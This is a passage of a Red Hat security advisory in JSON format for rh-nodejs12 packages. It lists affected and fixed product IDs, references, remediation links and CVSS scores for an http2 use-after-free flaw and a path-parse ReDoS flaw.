"7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-22940" }, { "category": "external", "summary": "RHBZ#1993029", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1993029" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-22940", "url": "https://www.cve.org/CVERecord?id=CVE-2021-22940" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-22940", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-22940" }, { "category": "external", "summary": "https://nodejs.org/en/blog/vulnerability/aug-2021-security-releases/", "url": "https://nodejs.org/en/blog/vulnerability/aug-2021-security-releases/" } ], "release_date": "2021-08-11T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-08-26T10:18:55+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:3281" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "products": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Important" } ], "title": "nodejs: Use-after-free on close http2 on stream canceling" }, { "cve": "CVE-2021-23343", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2021-05-04T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1956818" } ], "notes": [ { "category": "description", "text": "A flaw was found in nodejs-path-parse. All versions of package path-parse are vulnerable to Regular Expression Denial of Service (ReDoS) via splitDeviceRe, splitTailRe, and splitPathRe regular expressions. ReDoS exhibits polynomial worst-case time complexity.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-path-parse: ReDoS via splitDeviceRe, splitTailRe and splitPathRe", "title": "Vulnerability summary" }, { "category": "other", "text": "In Red Had Quay , whilst a vulnerable version of `path-parse` is included in the quay-rhel8 container it is a development dependency only, hence the impact by this vulnerability is low.\n\nIn OpenShift Container Platform (OCP), the hadoop component which is a part of the OCP metering stack, ships the vulnerable version of \u0027path-parse\u0027.\nSince the release of OCP 4.6, the metering product has been deprecated [1], hence the affected component is marked as wontfix.\nThis may be fixed in the future.\n\nIn Red Hat OpenShift Container Storage 4 the noobaa-core container includes the affected version of `path-parse`, however the vulnerable functionality is currently not used in any part of the product.\n\nIn Red Hat Virtualization cockpit-ovirt, ovirt-engine-ui-extensions and ovirt-web-ui use vulnerable version of `path-parse`, however for cockpit-ovirt it is a development time dependency only, and for ovirt-engine-ui-extensions and ovirt-web-ui the vulnerable functions are never used.\n\n[1] https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-release-notes.html#ocp-4-6-metering-operator-deprecated", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-23343" }, { "category": "external", "summary": "RHBZ#1956818", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1956818" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-23343", "url": "https://www.cve.org/CVERecord?id=CVE-2021-23343" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-23343", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-23343" }, { "category": "external", "summary": "https://snyk.io/vuln/SNYK-JS-PATHPARSE-1077067", "url": "https://snyk.io/vuln/SNYK-JS-PATHPARSE-1077067" } ], "release_date": "2021-05-04T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-08-26T10:18:55+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:3281" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" }, "products": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", 